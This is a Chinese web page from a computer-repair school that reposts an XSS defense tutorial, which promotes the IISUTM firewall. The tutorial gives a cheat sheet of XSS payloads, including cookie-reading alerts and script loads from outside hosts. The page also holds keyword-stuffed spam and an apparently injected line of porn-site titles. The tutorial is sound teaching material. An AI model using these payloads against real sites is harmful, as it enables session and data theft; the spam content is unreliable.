<sub id="f7vpn"><dfn id="f7vpn"></dfn></sub>
<form id="f7vpn"></form>

<form id="f7vpn"></form>

<address id="f7vpn"><form id="f7vpn"><listing id="f7vpn"></listing></form></address>
    <em id="f7vpn"><form id="f7vpn"></form></em>

    <noframes id="f7vpn"><form id="f7vpn"></form>

    <address id="f7vpn"></address>

      手機網站 網站地圖 城市 綜合 文章 資訊 湖南長沙陽光電腦維修培訓學校是一家以電腦維修技術為核心的電腦維修培訓學校,主營湖南電腦維修培訓,長沙電腦維修培訓。學校的主要課程有電腦維修培訓,電腦維修培訓,電腦維修培訓,歡迎全國各地學員來我校學習電腦維修技術。學校常年開設:電腦維修培訓,電腦維修培訓,電腦維修培訓,電腦維修入門,線下電腦維修培訓,電腦維修學習,電腦維修培訓,電腦維修培訓,機器人培訓。提供電腦維修學員最關心的問題:電腦維修培訓,電腦維修培訓機構,一般電腦維修培訓要多少錢,電腦維修專業培訓機構,電腦維修培訓,電腦維修基礎培訓,專業電腦維修培訓,電腦維修培訓學校哪個好,電腦維修培訓大概多少錢,電腦維修培訓學校,學習電腦維修培訓,電腦維修培訓班大概多長時間,電腦維修培訓,電腦維修入門培訓,電腦維修零基礎自學入門,電腦維修培訓班有用嗎,電腦維修培訓多少錢,電腦維修培訓要多少錢,招生地區:中山,固原,銀川,玉樹,海東,隴南,酒泉,張掖,天水,金昌,蘭州,榆林,延安,渭南,銅川,阿里,山南,拉薩,怒江,文山州,楚雄州,普洱,昭通,玉溪,昆明,畢節,銅仁,遵義,貴陽,甘孜州,資陽,達州,宜賓,南充,遂寧,綿陽,瀘州,自貢,三亞,崇左,河池,玉林,欽州,梧州,柳州,梅州,肇慶,湛江,佛山,珠海,韶關,湘西州,懷化,郴州,張家界,邵陽,株洲,仙桃,隨州,荊州,荊門,襄樊,黃石,駐馬店,信陽,南陽,漯河,中衛,石嘴山,海西,海南藏州,黃南州,海北,甘南,慶陽,平涼,武威,白銀,嘉峪關,安康,漢中,咸陽,寶雞,林芝,日喀則,昌都,迪慶,德宏,大理,西雙版納,紅河州,臨滄,麗江,保山,曲靖,黔東州,黔西州,安順,六盤水,涼山州,阿壩州,雅安,廣安,眉山,內江,廣元,德陽,攀枝花,成都,?,來賓,百色,貴港,北海,桂林,南寧,云浮,揭陽,潮州,清遠,陽江,汕尾,惠州,茂名,江門,汕頭,深圳,廣州,婁底,永州,益陽,岳陽,湘潭,長沙,恩施州,黃岡,孝感,鄂州,十堰,武漢,周口,商丘,三門峽,許昌,焦作,安陽,鶴壁,平頂山,開封,鄭州,聊城,濱州,德州,萊蕪,日照,泰安,煙臺,濰坊,東營,淄博,上饒,濟南,撫州,宜春,贛州,新余,九江,景德鎮,寧德,南平,泉州,莆田,廈門,宣城,亳州,六安,宿州,黃山,滁州,安慶,淮北,馬鞍山,蚌埠,蕪湖,合肥,麗水,舟山,衢州,金華,湖州,嘉興,寧波,宿遷,鎮江,鹽城,連云港,蘇州,徐州,南京,綏化,牡丹江,佳木斯,大慶,鶴崗,哈爾濱,白城,白山,遼源,吉林,葫蘆島,鐵嶺,盤錦,阜新,錦州,本溪,鞍山,沈陽,錫林郭勒盟,通遼,烏海,呂梁,忻州,晉中,晉城,陽泉,太原,廊坊,承德,保定,邯鄲,唐山,寧夏,甘肅,西藏,貴州,重慶,廣西,湖南,河南,江西,安徽,江蘇,黑龍江,遼寧,山西,天津,四平,內蒙古,吳忠,果洛,西寧,定西,商洛,西安,那曲,黔南州,巴中,樂山,賀州,防城港,東莞,河源,常德,衡陽,咸寧,宜昌,濮陽,新鄉,洛陽,菏澤,臨沂,威海,濟寧,棗莊,青島,吉安,鷹潭,萍鄉,南昌,龍巖,漳州,三明,福州,池州,巢湖,阜陽,銅陵,淮南,臺州,紹興,溫州,杭州,泰州,揚州,淮安,南通,常州,無錫,大興安嶺,黑河,七臺河,伊春,雙鴨山,雞西,齊齊哈爾,延邊,松原,通化,長春,朝陽,遼陽,營口,丹東,撫順,大連,阿拉善盟,興安盟,烏蘭察布,巴彥淖爾,呼倫貝爾,鄂爾多斯,赤峰,包頭,呼和浩特,臨汾,運城,朔州,長治,大同,衡水,滄州,張家口,邢臺,秦皇島,石家莊,青海,陜西,云南,四川,海南,廣東,湖北,山東,福建,浙江,上海,吉林,河北,北京
      陽光PLC編程培訓學校形象圖片
      湖南陽光PLC編程培訓學校
      畢業學員的真情感言
    1. 最新報名學員名單(實時滾動)
      最新就業創業學員名單
      WEB安全防范XSS跨站式腳本攻擊
      WEB安全防范XSS跨站式腳本攻擊
      當前位置: > 網絡技術更新時間:2021-10-16 21:55:45主題:WEB安全防范XSS跨站式腳本攻擊 圍觀:

      原文:www.iisutm.com

      網站要怎么防范常見的XSS跨站式腳本攻擊呢,我們先從XSS跨站式腳本攻擊的原理來說起。

      網站遭受XSS跨站式腳本攻擊的基本原理

      1.本地利用漏洞,這種漏洞存在于頁面中客戶端腳本自身。

      其攻擊過程如下所示:

      A給B發送一個惡意構造了Web的URL。

      B點擊并查看了這個URL。

      惡意頁面中的JavaScript打開一個具有漏洞的HTML頁面并將其安裝在B電腦上。

      具有漏洞的HTML頁面包含了在B電腦本地域執行的JavaScript。

      A的惡意腳本可以在B的電腦上執行B所持有的權限下的命令。

      2反射式漏洞,這種漏洞和本地利用漏洞有些類似,不同的是Web客戶端使用Server端腳本生成頁面為用戶提供數據時,如果未經驗證的用戶數據被包含在頁面中而未經HTML實體編碼,客戶端代碼便能夠注入到動態頁面中。

      其攻擊過程如下:

      A經常瀏覽某個網站,此網站為B所擁有。B的站點運行A使用用戶名/密碼進行登錄,并存儲敏感信息(比如銀行帳戶信息)。

      C發現B的站點包含反射性的XSS漏洞。

      C編寫一個利用漏洞的URL,并將其冒充為來自B的郵件發送給A。

      A在登錄到B的站點后,瀏覽C提供的URL。

      嵌入到URL中的惡意腳本在A的瀏覽器中執行,就像它直接來自B的服務器一樣。此腳本盜竊敏感信息(授權、信用卡、帳號信息等)然后在A完全不知情的情況下將這些信息發送到C的Web站點。

      3存儲式漏洞,該類型是應用最為廣泛而且有可能影響到Web服務器自身安全的漏洞,駭客將攻擊腳本上傳到Web服務器上,使得所有訪問該頁面的用戶都面臨信息泄漏的可能,其中也包括了Web服務器的管理員。

      其攻擊過程如下:

      B擁有一個Web站點,該站點允許用戶發布信息/瀏覽已發布的信息。

      C注意到B的站點具有存儲式的XXS漏洞。

      C發布一個熱點信息,吸引其它用戶紛紛閱讀。

      B或者是任何的其他人如A瀏覽該信息,其會話cookies或者其它信息將被C盜走。

      類型A直接威脅用戶個體,而類型B和存儲式漏洞所威脅的對象都是企業級Web應用。

      網站遭受XSS跨站式腳本攻擊的基本方式

      1. DOM-based cross-site scripting

      頁面本身包含一些DOM對象的操作,如果未對輸入的參數進行處理,可能會導致執行惡意腳本。如下面一些DOM操作:

      document.URL

      document.URLUnencoded

      document.location (and many of its properties)

      document.referrer

      window.location (and many of its properties)


      舉個例子,假如某個脆弱的頁面的代碼如下:

      <HTML>

      <TITLE>Welcome!</TITLE>

      Hi

      <SCRIPT>

      var pos=document.URL.indexOf("name=")+5;

      document.write(document.URL.substring(pos,document.URL.length));

      </SCRIPT>

      <BR>

      Welcome to our system

      </HTML>

      攻擊者使用如下的URL訪問時,則非常危險:

      http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

      試了一下,貌似IE、FireFox等瀏覽器默認 對<script>alert(document.cookie)</script>進行了編碼,阻止了腳本的執行。但是對于 DOM操作還是要更加謹慎啊,比如把上面的頁面修改一下,安全性就增強了不少:

      <SCRIPT>

      var pos=document.URL.indexOf("name=")+5;

      var name=document.URL.substring(pos,document.URL.length);

      if (name.match(/^[a-zA-Z0-9]$/))

      {

      document.write(name);

      }

      else

      {

      window.alert("Security error");

      }

      </SCRIPT>

      2. Reflected cross-site scripting

      也被稱為None-Persistent cross-site scripting,即,非持久化的XSS攻擊,是我們通常所說的,也是最常用,使用最廣的一種方式。它通過給別人發送帶有惡意腳本代碼參數的URL,當 URL地址被打開時,特有的惡意代碼參數被HTML解析、執行。它的特點是非持久化,必須用戶點擊帶有特定參數的鏈接菜能引起。

      3. Persistent cross-site scripting

      持久化XSS攻擊,指的是惡意腳本代碼被存儲進被攻擊的數據庫,當其他用戶正常瀏覽網頁時,站點從數據庫中讀取了非法用戶存入非法數據,惡意腳本代碼被執行。這種攻擊類型通常在留言板等地方出現。

      實施方式

      我們來試一把Reflected cross-site scripting。當我們在某網站輸入參數XXX,發現參數XXX原樣的出現在了頁面源碼中:

      <input type="text" class="Seach" name="w" value="XXX" />
      OK,可以開始做文章了,我們將XXX替換為:abc"/><script>alert('haha')</script><a href=",返回的HTML代碼如下:

      <input type="text" class="Seach" name="w" value="abc"/>
      <script>alert('haha')</script><!--" />
      這樣,<script>alert('haha')</script>被執行了。這里再舉例一些XSS攻擊行為:

      <IMG SRC="javascript:alert('XSS');">
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
      <IMG SRC="jav ascript:alert('XSS');">
      <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
      <<SCRIPT>alert("XSS");//<</SCRIPT>
      <iframe src=http://example.com/scriptlet.html <
      <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
      <BODY BACKGROUND="javascript:alert('XSS')">
      <BODY ONLOAD=alert(document.cookie)>
      <BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert("XSS")>
      <IMG DYNSRC="javascript:alert('XSS')">
      <IMG DYNSRC="javascript:alert('XSS')">
      <BR SIZE="&{alert('XSS')}">
      <IMG SRC='vbscript:msgbox("XSS")'>
      <TABLE BACKGROUND="javascript:alert('XSS')">
      <DIV STYLE="width: expression(alert('XSS'));">
      <DIV STYLE="background-image: url(javascript:alert('XSS'))">
      <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
      <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
      <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
      <A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
      <IMG SRC=javascript:alert('XSS')>
      <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
      a="get"
      b="URL("""
      c="javascript:"
      d="alert('XSS');"")"
      eval(a+b+c+d);
      總結一下,要防止XSS跨站式腳本攻擊主要是要在查詢字符串(QueryString),表單數據(PostData)以及Cookie甚至HTTP報頭(Header)中防止掉一些javascript關鍵字和一些敏感的字符(單引號,分號)以及SQL語言的關鍵字,以及防止他們使用encode編碼。

      用ASP或者PHP腳本來實現上面的這些想起來就很麻煩。下面就來介紹下用一個第三方工具IISUTM來處理上面我們說到的問題。

      準備工作:先去www.iisutm.com下載最新的IISUTM版本。

      根據IISUTM網站防火墻安裝及操作手冊 中的說明把IISUTM部署到你的服務器上來,這里需要注意的是使用Windows 2003+iis6的服務器,需要開啟iis中“以IIS5.0 隔離模式運行 www 服務選項才能正常使用該軟件。

      安裝完成,通過瀏覽器訪問IISUTM的配置管理界面默認的是http://127.0.0.1:8362,這個是私有地址,只能在該服務器上訪問,你需要任何地方都能訪問的話,可以在安裝的時候IP地址的選項那里填入你服務器的公網IP地址,和你所開放的端口。這樣你就可以通過你配置的地址進行訪問,或者你可以在iis中直接管理名為IISUTM的站點。

      登陸管理界面后點擊上面導航欄中的“基本設置,然后點擊左邊菜單的“防XSS攻擊鏈接。

      開啟該鏈接里所有的選項,選中之后IISUTM會自動保存配置,下面的“使用不允許的發送序列是該軟件提供的XSS攻擊關鍵字的特征庫,你可以根據你網站的情況進行更改(最好不要修改)。

      確認以上的配置以后,你可以返回到IISUTM管理界面的首頁,這里會列出最近服務器遭受到的攻擊以及詳細,趕緊去看看你的網站是不是隨時有人在進行SQL注入吧,以及哪些攻擊被IISUTM處理掉了。

      標簽:


      溫馨提示:湖南陽光技術學校常年面向全國招生(不限年齡)。由湖南陽光技術學校實戰一線首席技術專家授課,天天實操,全程實戰,手把手教,包教包會。我們是正規技術學校,我們有自己的校園,我們是行業正規軍!我們有自己的教學樓、學員公寓樓、籃球場(2個)、有校內花園、有專業實操車間。我們會為您提供海量的WEB安全防范XSS跨站式腳本攻擊的信息,如果您想了解有關WEB安全防范XSS跨站式腳本攻擊方面的更多資訊,請經常關注我校網站:www.www.009dxj.com 也可以加我們微信號:yp941688 或 yp94168;我們將給你最詳細的與WEB安全防范XSS跨站式腳本攻擊相關的解答。 如果您對湖南陽光技術學校發布的WEB安全防范XSS跨站式腳本攻擊這條信息有什么好的建議,請告訴我們。您的寶貴建議對我們逐步完善WEB安全防范XSS跨站式腳本攻擊的內容有重要的參考作用!

        隨機文章


        安防監控技術學校
        安防監控技術學校
        安防監控技術學校
        返回頂部
        久草热久草在线视频-好好的日在线视频观看-a级超碰视频在线观看